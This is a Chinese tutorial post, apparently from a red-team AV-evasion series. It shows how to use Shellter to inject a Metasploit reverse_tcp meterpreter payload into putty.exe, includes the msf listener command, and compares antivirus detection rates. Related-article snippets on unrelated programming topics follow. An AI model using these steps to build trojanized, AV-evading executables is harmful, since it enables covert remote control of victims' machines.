远控免杀专题7 ---shellter免杀

0x01 免杀能力一览表

在这里插入图片描述
几点说明:

1、上表中标识 √ 说明相应杀毒软件未检测出病毒,也就是代表了Bypass。

2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。

3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2019.12.12),火绒版本5.0.33.13(2019.12.12),360安全卫士12.0.0.2001(2019.12.17)。

4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。

0x02 前言

Shellter和Venom、Veil是三大老牌免杀工具,Shellter是一个开源的免杀工具,利用动态Shellcode注入或者命令来实现免杀的效果。

0x03 安装shellter

1、kali中已经自带shellter,可在图形界面中直接执行shellter命令即可
在这里插入图片描述

2、ubuntu系统中apt安装


apt-get update
apt-get install shellter

3、手动下载windows版
官方下载站点 https://www.shellterproject.com/download/
下载后解压,无需安装,cmd下可直接使用
在这里插入图片描述

0x04 生成payload

我就直接用kali自带的shellter进行演示,需要提前准备一个pe文件作为被注入程序。我还是用之前选的putty.exe来进行测试。
在这里插入图片描述
之后程序会把putty.exe进行备份,因为生成的payload会自动覆盖原来的putty.exe。
在这里插入图片描述
还是选择windows/meterpreter/reverse_tcp作为payload
在这里插入图片描述
上面有个选项Enable Stealth Mode,是否启用隐身模式,启用后免杀效果会变差,建议不启用。

全程自动化生成,最终的生成文件会替换原来的putty.exe。

通过对比可发现程序稍微变大了
在这里插入图片描述
在msf中使用handler -H 10.211.55.2 -P 3333 -p windows/meterpreter/reverse_tcp进行监听
在这里插入图片描述
在测试机中执行生成的putty.exe,360和火绒均可免杀,我试的时候火绒不可免杀,可能我的火绒版本比较高
在这里插入图片描述
msf正常上线
在这里插入图片描述

0x05 小结

Shellter安装非常简单,使用也非常便捷,而且生成的payload免杀效果也都比较好,windows和linux下都可以使用,实在是居家旅行、**灭口必备良药。我是用的自动模式进行生产payload,你可以根据自己的需要进行手动配置,这样生成的payload免杀效果会更好。

因为Shellter生成的shellcode是动态的,所以被查杀的几率也有所不同,测试过几次自动化生成的payload,最好的秒杀效果是4/71,最差的15/70,整体来说也算不错了

0x06 参考

msf免杀及后渗透技术:https://bbs.ichunqiu.com/thread-49618-1-1.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/380275.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Notepad++高亮AS文件

如果编写ActionScript,可以选择语言->Flash actionScript 但是软件似乎不能确定as文件使用的语言,需要修改软件配置 Notepad 有 ActionScript 的语法高亮功能, 但它似乎不能被程序探查到. 打开的每个 AS 文件, 都要自行套用语法高亮, 特别麻烦. 当你打…

python 示例_Python日历类| yeardayscalendar()方法与示例

python 示例Python Calendar.yeardayscalendar()方法 (Python Calendar.yeardayscalendar() Method) Calendar.yeardayscalendar() method is an inbuilt method of the Calendar class of calendar module in Python. It uses an instance of this class and returns the list…

获取两个数的最大值,判断是否相等;

package asdwwssq; import java.util.Scanner;//引入扫描仪Scanner,创建键盘录入对象; public class qweqwe { public static void main(String[] args) { Scanner anew Scanner(System.in);//将一个新扫描仪赋给a; System.out.println(“请输入第一…

ASP.NET 开发规范 第五章 命名

第五章 命名规范<?xml:namespace prefix o ns "urn:schemas-microsoft-com:office:office" />5.1 命名概述名称应该说明“什么”而不是“如何”。通过避免使用公开基础实现&#xff08;它们会发生改变&#xff09;的名称&#xff0c;可以保留简化复杂…

ajax传值controller怎么写,ajax向 controller传值(示例代码)

第一种传值&#xff1a;controller中是几个单独的基本类型参数RequestMapping("update")ResponseBody//此注解不能省略 否则ajax无法接受返回值public Map update(Long num, Long id, BigDecimal amount){Map resultMap new HashMap();if(num null || id null || …

将文件拖到docker容器里,将docke 容器里文件拖到宿主里

docker将/root/shell目录下的putty.exe复制到容器内部&#xff1a; 查看容器ID&#xff1a; docker ps 复制&#xff1a; docker cp /root/shell/putty.exe 容器ID:/root docker将容器内部的/root/shell/payload.exe复制到宿主里&#xff1a; docker cp b8d6b6b6296d:/root…

css 控制溢出文本显示省略号效果

同时应用&#xff1a; text-overflow:ellipsis; white-space:nowrap; overflow:hidden; 实现了所想要得到的溢出文本显示省略号效果&#xff1a;转载于:https://www.cnblogs.com/wyblog/archive/2011/09/02/2163547.html

前序遍历m-ary树_在Ruby中使用ary [start,length]- object进行数组元素分配

前序遍历m-ary树In the last article, we have learnt how we can add an object as an element to the object of Array class and we did that with the help of Array_instance[index] operator? That was also one of the ways to assign elements to the Array instances…

方法之输出星型及其调用

package asdaaaa; import java.util.Scanner;//引用扫描仪Scanner&#xff0c;创建键盘录入对象&#xff1b; public class adasdasd { public static void main(String[] args) { Scanner anew Scanner(System.in); System.out.println(“请输入行数&#xff1a;”); in…

ajax 如何禁止 预检请求,如何跳过“选项”预检请求?

我开发了一个PhoneGap应用程序&#xff0c;现在将其转换为移动网站。除了一处小故障&#xff0c;一切都可以顺利进行。我通过POST请求使用了某个第三方API&#xff0c;该API在该应用中可以正常运行&#xff0c;但在移动网站版本中却无法运行。仔细查看后&#xff0c;看来Angula…

拜托,出来混有点专业精神好不好

2007年5月25日的安徽日报头版中武警防汛大演练照片如下&#xff1a;很明显的最上面的两艘船是一样的&#xff0c;甚至连激起的浪花都相同&#xff0c;真不知道ps这幅图的同学当时怎么想的&#xff0c;一点专业精神都没有撒&#xff5e;再看看下面的盗版光碟《十面埋妇》的包装&…

WF事件驱动(5)

之前&#xff0c;我通过4篇文章介绍了在WF4中开发基于事件的工作流的范例。请参考下面的链接。 这一篇是这个系列的最后一篇&#xff0c;介绍如何通过配置文件&#xff0c;而不是代码的方式启动宿主。这在现实工作中是相当有用的&#xff0c;请大家参考下面的实例。 【注意】有…

合页损失,铰链损失_多点铰链损失功能 使用Python的线性代数

合页损失,铰链损失Hinge Loss is a loss function used in Machine Learning for training classifiers. The hinge loss is a maximum margin classification loss function and a major part of the SVM algorithm. 铰链损失是机器学习中用于训练分类器的损失函数。 铰链损失…

远控免杀专题8---BackDoor-Facktory免杀

0x01 免杀能力一查表 几点说明&#xff1a; 1、上表中标识 √ 说明相应杀毒软件未检测出病毒&#xff0c;也就是代表了Bypass。 2、为了更好的对比效果&#xff0c;大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全…

Visual Studio 2010旗舰版在安装Windows Phone 7 SDK后项目模版里没有Windows Phone 项目解决办法...

这个方法解决安装Windows Phone Develop Tools自带的Visual Studio 2010 Express for Windows Phone后&#xff0c;在已安装的Visual Studio 2010旗舰版中没有Windows Phone 7项目的情况。 1.找到Express版的模板&#xff0c;通常在&#xff1a; C:\Program Files (x86)\Micros…

不用ajax实现动态分页,详解ajax +jtemplate实现动态分页

jtemplate是一个基于JQuery的模板引擎插件&#xff0c;功能非常强大&#xff0c;有了她你就再不用为使用JS绑定数据集而发愁了。主要思路&#xff0c;复制textarea作为模板&#xff0c;ajax加载json数据&#xff0c;添加模板&#xff0c;绑定数据&#xff0c;更新加载更多事件。…

程序员每天每周每月每年该做的事

1、总结自己一天任务的完成情况  最好的方式是写工作日志&#xff0c;把自己今天完成了什么事情&#xff0c;遇见了什么问题都记录下来&#xff0c;日后翻看好处多多。 2、考虑自己明天应该做的主要工作  把明天要做的事情列出来&#xff0c;并按照优先级排列&#xff0c;第…

C和汇编----存储类别、链接和内存管理

0x01 存储类别 1、作用域 一个C变量的作用域可以是块作用域、函数作用域、函数原型作用域或文件作用域。 1.1 块作用域&#xff1a; 块是用一对花括号括起来的代码区域。比如函数体就是一个块。定义在块中的变量具有块作用域&#xff0c;块作用域变量的可见范围是从定义处到包…

倒三角(随即输入)

package wsq; import java.util.*; public class wsqyy {public static void main(String[] args) {Scanner wsqnew Scanner(System.in);int xwsq.nextInt();int i,j,k;for(i0;i<x;i)//第一个for循环控制行数&#xff1b;{for(j0;j<i;j)//第二个for循环控制输出&#xff…

调用向量的第i维分量| 使用Python的线性代数

Prerequisite: Linear Algebra | Defining a Vector 先决条件&#xff1a; 线性代数| 定义向量 Linear algebra is the branch of mathematics concerning linear equations by using vector spaces and through matrices. In other words, a vector is a matrix in n-dimensi…